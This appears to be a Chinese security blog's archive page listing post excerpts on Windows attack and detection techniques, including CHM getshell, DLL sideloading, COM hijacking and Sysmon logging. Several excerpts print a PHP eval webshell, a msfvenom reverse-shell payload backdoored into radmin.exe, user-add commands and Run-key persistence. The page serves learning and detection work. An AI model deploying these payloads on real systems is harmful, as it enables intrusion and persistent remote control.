04 2022 档案
摘要:主引导记录 MBR是在BIOS完成硬件初始化后首次加载的磁盘部分。它是引导加载程序的位置。对启动驱动器具有原始访问权限的对手可能会覆盖此区域,从而将启动期间的执行从正常启动加载程序转移到对手代码。(引文:Lau 2011) 卷引导记录 MBR将引导过程的控制权传递给VBR。与MBR的情况类似,对启动
阅读全文
摘要:如何通过修改注册表关闭、开启windows10内置Windows Defender安全中心 方法一 1、win+R输入regedit,按回车键进入注册表编辑器。2、定位到计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Security
阅读全文
摘要:chm是Compiled HTML Help file的缩写,意为已编译的HTML帮助文件,当攻击者将恶意代码写入chm中,当用户点击就会执行预设的恶意命令。 chm命令执行示例 下载安装html help workshop,下载地址:https://www.helpandmanual.com/do
阅读全文
摘要:通过恶意chm文件getshell _ 2021年6月18日 晚上 825 字 14 分钟 前言 chm是Compiled HTML Help file的缩写,意为已编译的HTML帮助文件,当攻击者将恶意代码写入chm中,当用户点击就会执行预设的恶意命令。 chm命令执行示例 下载安装html he
阅读全文
摘要:hh.exe是微软windows系统程序,.chm扩展名的帮助文件默认是用hh.exe打开。如果用户此时并没有查看chm格式的电子书文件或帮助文件,hh.exe又在进程中反复出现,则可能中了hh.exe病毒。在正常情况下不建议用户对该类文件(hh.exe)进行随意的修改。它的存在对维护计算机系统的稳
阅读全文
摘要:执行操作: C:\Windows\system32>net user /add "jack" "fuckoff" 命令成功完成。 C:\Windows\system32>powershell Windows PowerShell 版权所有 (C) Microsoft Corporation。保留所有
阅读全文
摘要:下载phpstudy,链接:https://public.xp.cn/upgrades/phpStudy_64.zip,如下图启动wnmp。 webshell内容: <?php echo "Your response is: ";?> <?php @eval($_GET['cmd']);?> 写入C
阅读全文
摘要:https://flangvik.com/privesc/windows/bypass/2019/06/25/Sideload-like-your-an-APT.html 我是按照这个链接进行复现的,文章里使用的是notepad++,但是最新的notepad++已经没有了libcurl,所以我自己找
阅读全文
摘要:https://www.mdpi.com/2624-800X/1/3/21/htm 软件翻译如下: 针对高级持续威胁攻击向量的端点检测和响应系统的实证评估 经过 乔治·卡兰查斯 1 和 康斯坦丁诺斯·帕萨基斯 1,2,* 1 比雷埃夫斯大学信息学系, 80 Karaoli & Dimitriou S
阅读全文
摘要:Sideloading DLL攻击 2021年9月4日06:38:12逆向工程评论111 views787字阅读2分37秒阅读模式 今天看到了国外的一个白皮书,地址如下: https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deplo
阅读全文
摘要:https://github.com/BlueTeamLabs/sentinel-attack/tree/master/detections ==》这个更全些 https://github.com/Azure/Azure-Sentinel/blob/83c6d8c7f65a5f209f39f3e06
阅读全文
摘要:from:https://pentestlab.blog/2020/05/20/persistence-com-hijacking/?msclkid=5fdfee8bc15811ec8aa81df895acc3e4 Microsoft introduced Component Object Mode
阅读全文
摘要:生成payload:msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe靶机运行r2
阅读全文
摘要:补充:kali里两个虚拟机之间互相访问设置,https://blog.csdn.net/elie_yang/article/details/88895660,就只需要设置下桥接网络就行! kali里: sudo vi /etc/network/interfaces添加: auto eth0 ifac
阅读全文
摘要:持久化:Office 应用程序启动 子技术 (6) 对手可能会利用基于 Microsoft Office 的应用程序在初创公司之间保持持久性。Microsoft Office 是企业网络中基于 Windows 的操作系统上相当常见的应用程序套件。启动基于 Office 的应用程序时,有多种机制可用于
阅读全文
摘要:下载地址:https://www.tarasco.org/security/Process_Injector/processinjector.zip 进程注入(pinjector.exe)提权进程注入将pinjector注入到用户的进程里一起运行,进而同时拥有了对应的权限。是一种比较隐蔽的手段,不会
阅读全文
摘要:
阅读全文
摘要:我的效果: 运行: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v eKey /t REG_SZ /d "powershell -file helloword.ps1" 我的配置文件:Sysmon
阅读全文
摘要:原文:https://www.jianshu.com/p/43bf5aadfd28 我自己安装成功以后,可以看到采集的日志,运行powershell以后生成的日志: sysmon安装配置及其使用 走错说爱你关注 22021.09.15 11:11:09字数 900阅读 1,366 sysmon是微软
阅读全文
摘要:
阅读全文
摘要:reg命令是WindowsXP提供的,它可以添加、更改和显示注册表项中的注册表子项信息和值。 我自己运行示例: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xxxxKey /t REG_SZ
阅读全文
摘要:prevention settings里有: Force ASLR Mitigation:An address space layout randomization(ASLR) bypass attempt was detected and blocked. This may have been p
阅读全文
摘要:缩略语/术语中文 英文 解释 未知威胁 Unknown threat 未知威胁是一种与所有已知的漏洞和威胁都不匹配的威胁,通常表现为一种新的入侵攻击手段。未知威胁又分为两种,一种是能预测到可能会发生的,可以一定程度上进行防范的,称为“已知的未知威胁”。而另一种则是无法预测,因此让人无从防范的,则称
阅读全文
摘要:https://www.scopus.com/results/authorNamesList.uri?sort=count-f&src=al&sid=cbe762454a53aa5a9b57dc7da86b3644&sot=al&sdt=al&sl=44&s=AUTHLASTNAME%28Schei
阅读全文
摘要:要查看dll被哪个进程所使用,可以在process explorer里搜索! 这个技巧在分析恶意DLL加载时候非常有用!!! 笔记 可以通过process explorer查看进程注入的dll,比如注入后可以看到lab12-01.dll在注入的运行进程里。 启动器 Launcher 用来加载恶意代码
阅读全文
摘要:我在powershell里的命令: PS D:\> $action = New-ScheduledTaskAction -Execute 'notepad.exe' PS D:\> $trigger = New-ScheduledTaskTrigger -Daily -At 11am PS D:\>
阅读全文
摘要:web3游戏之构建蓝狐笔记于 2021-12-28 13:14:39 发布 126 web2游戏与web3游戏web2游戏是F2P(Free To Play)模式,其核心是售卖装备等虚拟物品。在这种模式中,游戏公司等控制了游戏的发展方向,其首要目的是如何从游戏设计中捕获更多的收益。此外,虽然玩家购买
阅读全文